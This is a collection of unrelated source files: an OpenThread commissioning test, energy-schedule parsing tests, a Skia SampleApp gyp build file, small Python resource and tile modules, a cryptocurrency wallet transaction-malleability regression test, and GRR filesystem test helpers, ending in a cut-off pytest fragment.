'name': 'COMMISSIONER',
'networkkey': '00112233445566778899aabbccddeeff',
'mode': 'rdn',
},
JOINER: {
'name': 'JOINER',
'networkkey': 'deadbeefdeadbeefdeadbeefdeadbeef',
'mode': 'rdn',
},
}
def test(self):
self.nodes[COMMISSIONER].interface_up()
self.nodes[COMMISSIONER].thread_start()
self.simulator.go(5)
self.assertEqual(self.nodes[COMMISSIONER].get_state(), 'leader')
self.nodes[COMMISSIONER].commissioner_start()
self.simulator.go(3)
self.nodes[COMMISSIONER].commissioner_add_joiner(self.nodes[JOINER].get_eui64(), 'PSKD01')
self.nodes[JOINER].interface_up()
self.nodes[JOINER].joiner_start('PSKD01')
self.simulator.go(10)
self.simulator.read_cert_messages_in_commissioning_log([COMMISSIONER, JOINER])
self.assertEqual(
self.nodes[JOINER].get_networkkey(),
self.nodes[COMMISSIONER].get_networkkey(),
)
joiner_messages = self.simulator.get_messages_sent_by(JOINER)
commissioner_messages = self.simulator.get_messages_sent_by(COMMISSIONER)
# 5.8,9,10,11
# - Joiner
command.check_joiner_commissioning_messages(joiner_messages.commissioning_messages)
# - Commissioner
command.check_commissioner_commissioning_messages(commissioner_messages.commissioning_messages)
# As commissioner is also joiner router
command.check_joiner_router_commissioning_messages(commissioner_messages.commissioning_messages)
self.nodes[JOINER].thread_start()
self.simulator.go(5)
self.assertEqual(self.nodes[JOINER].get_state(), 'router')
def verify(self, pv):
pkts = pv.pkts
pv.summary.show()
COMMISSIONER = pv.vars['COMMISSIONER']
COMMISSIONER_VERSION = pv.vars['COMMISSIONER_VERSION']
JOINER_VERSION = pv.vars['JOINER_VERSION']
# Step 3: Joiner sends MLE Discovery Request
# MLE Discovery Request message MUST have these values:
# - MLE Security Suite: 255 (No MLE Security)
# - Thread Discovery TLV
# Sub-TLVs:
# - Discovery Request TLV
# - Protocol Version: 2 or 3
# (depends on the Thread stack version in testing)
pkts.filter_mle_cmd(MLE_DISCOVERY_REQUEST).\
filter_LLARMA().\
filter(lambda p:
[THREAD_DISCOVERY_TLV] == p.mle.tlv.type and\
[NM_DISCOVERY_REQUEST_TLV] == p.thread_meshcop.tlv.type and\
p.thread_meshcop.tlv.discovery_req_ver == JOINER_VERSION
).\
must_next()
# Step 4: Commissioner sends MLE Discovery Response
# MLE Discovery Response message MUST have these values:
# - MLE Security Suite: 255 (No MLE Security)
# - Source Address in IEEE 802.15.4 header MUST be set to
# the MAC Extended Address (64-bit)
# - Destination Address in IEEE 802.15.4 header MUST be
# set to Discovery Request Source Address
# - Thread Discovery TLV
# Sub-TLVs:
# - Discovery Request TLV
# - Protocol Version: 2 or 3
# (depends on the Thread stack version in testing)
# - Extended PAN ID TLV
# - Joiner UDP Port TLV
# - Network Name TLV
# - Steering Data TLV
# - Commissioner UDP Port TLV (optional)
_rs_pkt = pkts.filter_wpan_src64(COMMISSIONER).\
filter_mle_cmd(MLE_DISCOVERY_RESPONSE).\
filter(lambda p: {
NM_EXTENDED_PAN_ID_TLV,
NM_NETWORK_NAME_TLV,
NM_STEERING_DATA_TLV,
NM_JOINER_UDP_PORT_TLV,
NM_DISCOVERY_RESPONSE_TLV
} <= set(p.thread_meshcop.tlv.type) and\
p.thread_meshcop.tlv.discovery_rsp_ver == COMMISSIONER_VERSION
).\
must_next()
# Step 5: Verify the following details occur in the exchange between
# Joiner and the Commissioner
# 1. UDP port (Specified by the Commissioner: in Discovery Response)
# is used as destination port for UDP datagrams from Joiner to
# the Commissioner.
# 2. Joiner sends an initial DTLS-ClientHello handshake record to the
# Commissioner
pkts.filter_wpan_dst64(COMMISSIONER).\
filter(lambda p:
p.dtls.handshake.type == [HANDSHAKE_CLIENT_HELLO] and\
p.udp.srcport in _rs_pkt.thread_meshcop.tlv.udp_port and\
p.udp.dstport in _rs_pkt.thread_meshcop.tlv.udp_port
).\
must_next()
# 3. The Commissioner receives the initial DTLS-ClientHello handshake
# record and sends a DTLS-HelloVerifyRequest handshake record Joiner
_pkt = pkts.filter_wpan_src64(COMMISSIONER).\
filter(lambda p: p.dtls.handshake.type == [HANDSHAKE_HELLO_VERIFY_REQUEST]).\
must_next()
_pkt.must_verify(lambda p: p.dtls.handshake.cookie is not None)
# 4. Joiner receives the DTLS-HelloVerifyRequest handshake record and sends
# a subsequent DTLS-ClientHello handshake record in one UDP datagram to the
# Commissioner
# Verify that both DTLS-HelloVerifyRequest and subsequent DTLS-ClientHello
# contain the same cookie
pkts.filter_wpan_dst64(COMMISSIONER).\
filter(lambda p:
p.dtls.handshake.type == [HANDSHAKE_CLIENT_HELLO] and\
p.dtls.handshake.cookie == _pkt.dtls.handshake.cookie
).\
must_next()
# 5. Commissioner must correctly receive the subsequent DTLSClientHello
# handshake record and then send, in order, DTLSServerHello,
# DTLS-ServerKeyExchange and DTLSServerHelloDone handshake records to Joiner
pkts.filter_wpan_src64(COMMISSIONER).\
filter(lambda p:
p.dtls.handshake.type == [HANDSHAKE_SERVER_HELLO,
HANDSHAKE_SERVER_KEY_EXCHANGE,
HANDSHAKE_SERVER_HELLO_DONE]
).\
must_next()
# 6. Joiner receives the DTLS-ServerHello, DTLSServerKeyExchange and
# DTLS-ServerHelloDone handshake records and sends, in order,
# a DTLS-ClientKeyExchange handshake record,
# a DTLS-ChangeCipherSpec record and
# an encrypted DTLS-Finished handshake record to the Commissioner.
pkts.filter_wpan_dst64(COMMISSIONER).\
filter(lambda p:
p.dtls.handshake.type == [HANDSHAKE_CLIENT_KEY_EXCHANGE] and\
{
CONTENT_CHANGE_CIPHER_SPEC,
CONTENT_HANDSHAKE
} == set(p.dtls.record.content_type)
).\
must_next()
# 7. Commissioner receives the DTLS-ClientKeyExchange handshake record, the
# DTLS-ChangeCipherSpec record and the encrypted DTLS-Finished handshake record,
# and sends a DTLS-ChangeCipherSpec record and an encrypted DTLSFinished handshake
# record in that order to Joiner
pkts.filter_wpan_src64(COMMISSIONER).\
filter(lambda p: {
CONTENT_CHANGE_CIPHER_SPEC,
CONTENT_HANDSHAKE
} == set(p.dtls.record.content_type)
).\
must_next()
# 8. Joiner receives the DTLS-ChangeCipherSpec record and the encrypted DTLS-Finished
# handshake record and sends a JOIN_FIN.req message in an encrypted DTLS-ApplicationData
# record in a single UDP datagram to Commissioner.
pkts.filter_wpan_dst64(COMMISSIONER).\
filter(lambda p:
[CONTENT_APPLICATION_DATA] == p.dtls.record.content_type
).\
must_next()
# 9. Commissioner receives the encrypted DTLS-ApplicationData record and sends a
# JOIN_FIN.rsp message in an encrypted DTLS-ApplicationData record in a single
# UDP datagram to Joiner
pkts.filter_wpan_src64(COMMISSIONER).\
filter(lambda p:
[CONTENT_APPLICATION_DATA] == p.dtls.record.content_type
).\
must_next()
# 10. Commissioner sends an encrypted JOIN_ENT.ntf message to Joiner
# 11. Joiner receives the encrypted JOIN_ENT.ntf message and sends an encrypted
# JOIN_ENT.ntf dummy response to Commissioner
# Check Step 8 ~ 11 in test()
# 12. Joiner sends an encrypted DTLS-Alert record with a code of 0 (close_notify)
# to Commissioner
pkts.filter_wpan_dst64(COMMISSIONER).\
filter(lambda p:
[CONTENT_ALERT] == p.dtls.record.content_type
).\
must_next()
if __name__ == '__main__':
unittest.main()
|
py | b4104e77d9dae2195988b5ad86faa0e33d2a5382 | from app.models.energy.scheduleruleset import ScheduleRulesetAbridged
from app.models.energy.schedulefixedinterval import ScheduleFixedIntervalAbridged
import os
# target folder where all of the samples live
root = os.path.dirname(os.path.dirname(__file__))
target_folder = os.path.join(root, 'app', 'models', 'samples')
def test_ruleset_office_occupancy():
file_path = os.path.join(
target_folder, 'schedule_ruleset_office_occupancy.json')
ScheduleRulesetAbridged.parse_file(file_path)
def test_primary_school_occupancy():
file_path = os.path.join(
target_folder, 'schedule_primary_school_occupancy.json')
ScheduleRulesetAbridged.parse_file(file_path)
def test_ruleset_simple_repeating():
file_path = os.path.join(
target_folder, 'schedule_ruleset_simple_repeating.json')
ScheduleRulesetAbridged.parse_file(file_path)
def test_fixedinterval_increasing_fine_timestep():
file_path = os.path.join(
target_folder, 'schedule_fixedinterval_increasing_fine_timestep.json')
ScheduleFixedIntervalAbridged.parse_file(file_path)
def test_fixedinterval_increasing_single_day():
file_path = os.path.join(
target_folder, 'schedule_fixedinterval_increasing_single_day.json')
ScheduleFixedIntervalAbridged.parse_file(file_path)
def test_fixedinterval_random_annual():
file_path = os.path.join(
target_folder, 'schedule_fixedinterval_random_annual.json')
ScheduleFixedIntervalAbridged.parse_file(file_path)
|
gyp | b4104ed2e26d553d4821a5cca7939c2eed123e79 | {
'targets': [
{
'target_name': 'SampleApp',
'type': 'executable',
'mac_bundle' : 1,
'include_dirs' : [
'../src/core',
'../src/effects', #needed for BlurMask.h
'../gm', # needed to pull gm.h
'../samplecode', # To pull SampleApp.h and SampleCode.h
'../src/pipe/utils', # For TiledPipeController
],
'includes': [
'gmslides.gypi',
],
'sources': [
'../gm/gm.cpp',
'../gm/gm.h',
'../samplecode/GMSampleView.h',
'../samplecode/ClockFaceView.cpp',
'../samplecode/OverView.cpp',
'../samplecode/OverView.h',
'../samplecode/Sample2PtRadial.cpp',
'../samplecode/SampleAAClip.cpp',
'../samplecode/SampleAARects.cpp',
'../samplecode/SampleAARectModes.cpp',
'../samplecode/SampleAll.cpp',
'../samplecode/SampleAnimator.cpp',
'../samplecode/SampleAnimBlur.cpp',
'../samplecode/SampleApp.cpp',
'../samplecode/SampleArc.cpp',
'../samplecode/SampleAvoid.cpp',
'../samplecode/SampleBigBlur.cpp',
'../samplecode/SampleBigGradient.cpp',
'../samplecode/SampleBitmapRect.cpp',
'../samplecode/SampleBlur.cpp',
'../samplecode/SampleCamera.cpp',
'../samplecode/SampleChart.cpp',
'../samplecode/SampleCircle.cpp',
'../samplecode/SampleClip.cpp',
'../samplecode/SampleCode.h',
'../samplecode/SampleColorFilter.cpp',
'../samplecode/SampleComplexClip.cpp',
'../samplecode/SampleConcavePaths.cpp',
'../samplecode/SampleCull.cpp',
'../samplecode/SampleDecode.cpp',
'../samplecode/SampleDegenerateTwoPtRadials.cpp',
'../samplecode/SampleDither.cpp',
'../samplecode/SampleDitherBitmap.cpp',
'../samplecode/SampleEffects.cpp',
'../samplecode/SampleEmboss.cpp',
'../samplecode/SampleEmptyPath.cpp',
'../samplecode/SampleEncode.cpp',
'../samplecode/SampleFatBits.cpp',
'../samplecode/SampleFillType.cpp',
'../samplecode/SampleFilter.cpp',
'../samplecode/SampleFilter2.cpp',
'../samplecode/SampleFontCache.cpp',
'../samplecode/SampleFontScalerTest.cpp',
'../samplecode/SampleFuzz.cpp',
'../samplecode/SampleGradients.cpp',
'../samplecode/SampleHairCurves.cpp',
'../samplecode/SampleHairline.cpp',
'../samplecode/SampleHairModes.cpp',
'../samplecode/SampleLayerMask.cpp',
'../samplecode/SampleLayers.cpp',
'../samplecode/SampleLCD.cpp',
'../samplecode/SampleLines.cpp',
'../samplecode/SampleManyRects.cpp',
'../samplecode/SampleMeasure.cpp',
'../samplecode/SampleMipMap.cpp',
'../samplecode/SampleMovie.cpp',
'../samplecode/SampleOvalTest.cpp',
'../samplecode/SampleOverflow.cpp',
'../samplecode/SamplePatch.cpp',
'../samplecode/SamplePath.cpp',
'../samplecode/SamplePathClip.cpp',
'../samplecode/SamplePathEffects.cpp',
'../samplecode/SamplePicture.cpp',
'../samplecode/SamplePictFile.cpp',
'../samplecode/SamplePoints.cpp',
'../samplecode/SamplePolyToPoly.cpp',
'../samplecode/SampleRegion.cpp',
'../samplecode/SampleRepeatTile.cpp',
'../samplecode/SampleRotateCircles.cpp',
'../samplecode/SampleShaders.cpp',
'../samplecode/SampleShaderText.cpp',
'../samplecode/SampleSkLayer.cpp',
'../samplecode/SampleSlides.cpp',
'../samplecode/SampleStrokePath.cpp',
'../samplecode/SampleStrokeText.cpp',
'../samplecode/SampleTests.cpp',
'../samplecode/SampleText.cpp',
'../samplecode/SampleTextAlpha.cpp',
'../samplecode/SampleTextBox.cpp',
'../samplecode/SampleTextOnPath.cpp',
'../samplecode/SampleTextureDomain.cpp',
'../samplecode/SampleTiling.cpp',
'../samplecode/SampleTinyBitmap.cpp',
'../samplecode/SampleUnitMapper.cpp',
'../samplecode/SampleVertices.cpp',
'../samplecode/SampleXfermodesBlur.cpp',
'../samplecode/TransitionView.cpp',
'../samplecode/TransitionView.h',
# DrawingBoard
#'../experimental/DrawingBoard/SkColorPalette.h',
#'../experimental/DrawingBoard/SkColorPalette.cpp',
#'../experimental/DrawingBoard/SkNetPipeController.h',
#'../experimental/DrawingBoard/SkNetPipeController.cpp',
#'../experimental/DrawingBoard/SampleDrawingClient.cpp',
#'../experimental/DrawingBoard/SampleDrawingServer.cpp',
# Networking
#'../experimental/Networking/SampleNetPipeReader.cpp',
#'../experimental/Networking/SkSockets.cpp',
#'../experimental/Networking/SkSockets.h',
# TiledPipeController
'../src/pipe/utils/SamplePipeControllers.h',
'../src/pipe/utils/SamplePipeControllers.cpp',
],
'sources!': [
'../samplecode/SampleSkLayer.cpp', #relies on SkMatrix44 which doesn't compile
'../samplecode/SampleTests.cpp', #includes unknown file SkShaderExtras.h
'../samplecode/SampleWarp.cpp',
'../samplecode/SampleFontCache.cpp',
],
'dependencies': [
'skia_base_libs.gyp:skia_base_libs',
'effects.gyp:effects',
'images.gyp:images',
'views.gyp:views',
'animator.gyp:animator',
'xml.gyp:xml',
'experimental.gyp:experimental',
'pdf.gyp:pdf',
'views_animated.gyp:views_animated',
],
'conditions' : [
[ 'skia_os in ["linux", "freebsd", "openbsd", "solaris"]', {
'sources!': [
'../samplecode/SampleDecode.cpp',
],
}],
[ 'skia_os == "win"', {
'sources!': [
# require UNIX functions
'../samplecode/SampleEncode.cpp',
],
}],
[ 'skia_os == "mac"', {
'sources!': [
'../samplecode/SampleDecode.cpp',
],
'sources': [
# Sample App specific files
'../src/views/mac/SampleApp-Info.plist',
'../src/views/mac/SampleAppDelegate.h',
'../src/views/mac/SampleAppDelegate.mm',
'../src/views/mac/SkSampleNSView.h',
'../src/views/mac/SkSampleNSView.mm',
# Mac files
'../src/views/mac/SkEventNotifier.h',
'../src/views/mac/SkEventNotifier.mm',
'../src/views/mac/skia_mac.mm',
'../src/views/mac/SkNSView.h',
'../src/views/mac/SkNSView.mm',
'../src/views/mac/SkOptionsTableView.h',
'../src/views/mac/SkOptionsTableView.mm',
'../src/views/mac/SkOSWindow_Mac.mm',
'../src/views/mac/SkTextFieldCell.h',
'../src/views/mac/SkTextFieldCell.m',
],
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/QuartzCore.framework',
'$(SDKROOT)/System/Library/Frameworks/OpenGL.framework',
],
'xcode_settings' : {
'INFOPLIST_FILE' : '../src/views/mac/SampleApp-Info.plist',
},
'mac_bundle_resources' : [
'../src/views/mac/SampleApp.xib',
],
}],
[ 'skia_os == "ios"', {
# TODO: This doesn't build properly yet, but it's getting there.
'sources!': [
'../samplecode/SampleDecode.cpp',
],
'sources': [
'../src/views/mac/SkEventNotifier.h',
'../src/views/mac/SkEventNotifier.mm',
'../experimental/iOSSampleApp/SkSampleUIView.h',
'../experimental/iOSSampleApp/SkSampleUIView.mm',
'../experimental/iOSSampleApp/SkiOSSampleApp-Base.xcconfig',
'../experimental/iOSSampleApp/SkiOSSampleApp-Debug.xcconfig',
'../experimental/iOSSampleApp/SkiOSSampleApp-Release.xcconfig',
'../experimental/iOSSampleApp/iOSSampleApp-Info.plist',
'../experimental/iOSSampleApp/Shared/SkOptionListController.h',
'../experimental/iOSSampleApp/Shared/SkOptionListController.mm',
'../experimental/iOSSampleApp/Shared/SkUIRootViewController.h',
'../experimental/iOSSampleApp/Shared/SkUIRootViewController.mm',
'../experimental/iOSSampleApp/Shared/SkOptionsTableViewController.h',
'../experimental/iOSSampleApp/Shared/SkOptionsTableViewController.mm',
'../experimental/iOSSampleApp/Shared/SkUIView.h',
'../experimental/iOSSampleApp/Shared/SkUIView.mm',
'../experimental/iOSSampleApp/Shared/SkUIDetailViewController.h',
'../experimental/iOSSampleApp/Shared/SkUIDetailViewController.mm',
'../experimental/iOSSampleApp/Shared/skia_ios.mm',
# iPad
'../experimental/iOSSampleApp/iPad/AppDelegate_iPad.h',
'../experimental/iOSSampleApp/iPad/AppDelegate_iPad.mm',
'../experimental/iOSSampleApp/iPad/SkUISplitViewController.h',
'../experimental/iOSSampleApp/iPad/SkUISplitViewController.mm',
'../experimental/iOSSampleApp/iPad/MainWindow_iPad.xib',
# iPhone
'../experimental/iOSSampleApp/iPhone/AppDelegate_iPhone.h',
'../experimental/iOSSampleApp/iPhone/AppDelegate_iPhone.mm',
'../experimental/iOSSampleApp/iPhone/SkUINavigationController.h',
'../experimental/iOSSampleApp/iPhone/SkUINavigationController.mm',
'../experimental/iOSSampleApp/iPhone/MainWindow_iPhone.xib',
'../src/views/ios/SkOSWindow_iOS.mm',
'../src/utils/ios/SkImageDecoder_iOS.mm',
'../src/utils/ios/SkStream_NSData.mm',
'../src/utils/ios/SkOSFile_iOS.mm',
'../include/utils/mac/SkCGUtils.h',
'../src/utils/mac/SkCreateCGImageRef.cpp',
'../experimental/iOSSampleApp/SkiOSSampleApp-Debug.xcconfig',
'../experimental/iOSSampleApp/SkiOSSampleApp-Release.xcconfig',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/CoreFoundation.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreGraphics.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreText.framework',
'$(SDKROOT)/System/Library/Frameworks/UIKit.framework',
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
'$(SDKROOT)/System/Library/Frameworks/QuartzCore.framework',
'$(SDKROOT)/System/Library/Frameworks/OpenGLES.framework',
'$(SDKROOT)/System/Library/Frameworks/ImageIO.framework',
'$(SDKROOT)/System/Library/Frameworks/MobileCoreServices.framework',
],
},
'include_dirs' : [
'../experimental/iOSSampleApp',
'../experimental/iOSSampleApp/iPad',
'../experimental/iOSSampleApp/iPhone',
'../include/utils/ios',
],
'xcode_settings' : {
'INFOPLIST_FILE' : '../experimental/iOSSampleApp/iOSSampleApp-Info.plist',
},
'xcode_config_file': '../experimental/iOSSampleApp/SkiOSSampleApp-Base.xcconfig',
'mac_bundle_resources' : [
'../experimental/iOSSampleApp/iPad/MainWindow_iPad.xib',
'../experimental/iOSSampleApp/iPhone/MainWindow_iPhone.xib',
],
}],
[ 'skia_os == "android"', {
'sources!': [
'../samplecode/SampleAnimator.cpp',
'../samplecode/SampleUnitMapper.cpp',
],
'dependencies!': [
'animator.gyp:animator',
'experimental.gyp:experimental',
],
'dependencies': [
'android_deps.gyp:Android_SampleApp',
],
}],
[ 'skia_gpu == 1', {
'include_dirs': [
'../src/gpu', # To pull gl/GrGLUtil.h
],
}],
[ 'skia_os == "nacl"', {
'sources': [
'../../nacl/src/nacl_sample.cpp',
],
}],
],
'msvs_settings': {
'VCLinkerTool': {
'SubSystem': '2',
},
},
},
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
|
py | b4104f9018afc70dfea6218deb04e0c71e7acc27 | from fanstatic import Library, Resource
from js.jquery import jquery
library = Library('jquery_notify', 'resources')
jquery_notify = Resource(library, 'jquery.notify.js', minified='jquery.notify.min.js', depends=[jquery,]) |
py | b41050040292a5fb47c819f4fdcd8c2f5d451c5d | __all__ = ['Tile-Air', 'Tile-AirBack', 'Tile-BackDirt', 'Tile-Bedrock', 'Tile-Coal', 'Tile-Copper', 'Tile-Dirt', 'Tile-Grass', 'Tile-Invisablock', 'Tile-Leaves', 'Tile-LeavesSnow', 'Tile-SnowTile', 'Tile-Stone', 'Tile-StoneBack', 'Tile-StoneBrick', 'Tile-Torch', 'Tile-Trunk', 'Tile-WoodPlank', 'Tile-WoodenBack', 'Tile-WoodenChest', 'Tile-WoodenDoorBottomClose', 'Tile-WoodenDoorBottomOpen', 'Tile-WoodenDoorMiddleClose', 'Tile-WoodenDoorMiddleOpen', 'Tile-WoodenDoorTopClose', 'Tile-WoodenDoorTopOpen'] |
py | b4105019ab5abc054aa725cda1a6ed1ba4c27bf2 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Flashpaychain Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet accounts properly when there are cloned transactions with malleated scriptsigs."""
from test_framework.test_framework import FlashpaychainTestFramework
from test_framework.util import *
class TxnMallTest(FlashpaychainTestFramework):
def set_test_params(self):
self.num_nodes = 4
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
parser.add_option("--segwit", dest="segwit", default=False, action="store_true",
help="Test behaviour with SegWit txn (which should fail")
def setup_network(self):
# Start with split network:
super(TxnMallTest, self).setup_network()
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
def run_test(self):
if self.options.segwit:
output_type="p2sh-segwit"
else:
output_type="legacy"
# All nodes should start with 1,250 BTC:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo", output_type)
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar", output_type)
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_locktime = rawtx1["locktime"]
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs, clone_locktime)
# createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 BTC serialized is 00286bee00000000
pos0 = 2*(4+1+36+1+4+1)
hex40 = "00286bee00000000"
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
if self.options.segwit:
assert_equal(txid1, txid1_clone)
return
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 BTC for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
|
py | b410507e425a649df7d89d7109689b3c5e4d94fe | #!/usr/bin/env python
"""A test utilities for interacting with filesystem."""
import io
import os
import platform
import subprocess
import unittest
from typing import Text
def CreateFile(filepath: Text, content: bytes = b"") -> None:
"""Creates a file at specified path.
Note that if a file at the specified path already exists, its old content will
be overwritten.
Args:
filepath: A path to the file to touch.
content: An (optional) content to write to the file.
"""
# There is a slight chance of a race condition here (the directory might have
# been created after the `os.path.exists` check). This utility is a test-only
# thing so wo do not care that much and just swallow any `OSError` exceptions.
# If we don't have right permissions, `io.open` will fail later anyway.
dirpath = os.path.dirname(filepath)
if not os.path.exists(dirpath):
try:
os.makedirs(dirpath)
except OSError:
pass
with io.open(filepath, "wb") as filedesc:
filedesc.write(content)
def Command(name, args=None, system=None, message=None):
"""Executes given command as a subprocess for testing purposes.
If the command fails, is not available or is not compatible with the operating
system a test case that tried to called is skipped.
Args:
name: A name of the command to execute (e.g. `ls`).
args: A list of arguments for the command (e.g. `-l`, `-a`).
system: An operating system that the command should be compatible with.
message: A message to skip the test with in case of a failure.
Raises:
SkipTest: If command execution fails.
"""
args = args or []
if system is not None and platform.system() != system:
raise unittest.SkipTest("`%s` available only on `%s`" % (name, system))
if subprocess.call(["which", name], stdout=open("/dev/null", "w")) != 0:
raise unittest.SkipTest("`%s` command is not available" % name)
if subprocess.call([name] + args, stdout=open("/dev/null", "w")) != 0:
raise unittest.SkipTest(message or "`%s` call failed" % name)
def Chflags(filepath, flags=None):
"""Executes a `chflags` command with specified flags for testing purposes.
Calling this on platforms different than macOS will skip the test.
Args:
filepath: A path to the file to change the flags of.
flags: A list of flags to be changed (see `chflags` documentation).
"""
flags = flags or []
Command("chflags", args=[",".join(flags), filepath], system="Darwin")
def Chattr(filepath, attrs=None):
"""Executes a `chattr` command with specified attributes for testing purposes.
Calling this on platforms different than Linux will skip the test.
Args:
filepath: A path to the file to change the attributes of.
attrs: A list of attributes to be changed (see `chattr` documentation).
"""
attrs = attrs or []
message = "file attributes not supported by filesystem"
Command("chattr", args=attrs + [filepath], system="Linux", message=message)
def SetExtAttr(filepath, name, value):
"""Sets an extended file attribute of a given file for testing purposes.
Calling this on platforms different than Linux or macOS will skip the test.
Args:
filepath: A path to the file to set an extended attribute of.
name: A name of the extended attribute to set.
value: A value of the extended attribute being set.
Raises:
SkipTest: If called on unsupported platform.
"""
system = platform.system()
if system == "Linux":
_SetExtAttrLinux(filepath, name=name, value=value)
elif system == "Darwin":
_SetExtAttrOsx(filepath, name=name, value=value)
else:
message = "setting extended attributes is not supported on `%s`" % system
raise unittest.SkipTest(message)
def _SetExtAttrLinux(filepath, name, value):
args = ["-n", name, "-v", value, filepath]
message = "extended attributes not supported by filesystem"
Command("setfattr", args=args, system="Linux", message=message)
def _SetExtAttrOsx(filepath, name, value):
args = ["-w", name, value, filepath]
message = "extended attributes are not supported"
Command("xattr", args=args, system="Drawin", message=message)
|
py | b41050b80a9cc015d3baca79949feec94791e99c | # -*- coding: utf-8 -*-
import time
from pytest import mark
@mark.parametrize('with_message', [True, False])
@mark.parametrize('hard_deployment', [True, False])
@mark.parametrize('final_release_state', [
'DEPLOYED', 'FAILED', 'UNKNOWN', 'TEMP_DEPLOYMENT_FAILURE'
])
@mark.parametrize('maintenance', [True, False])
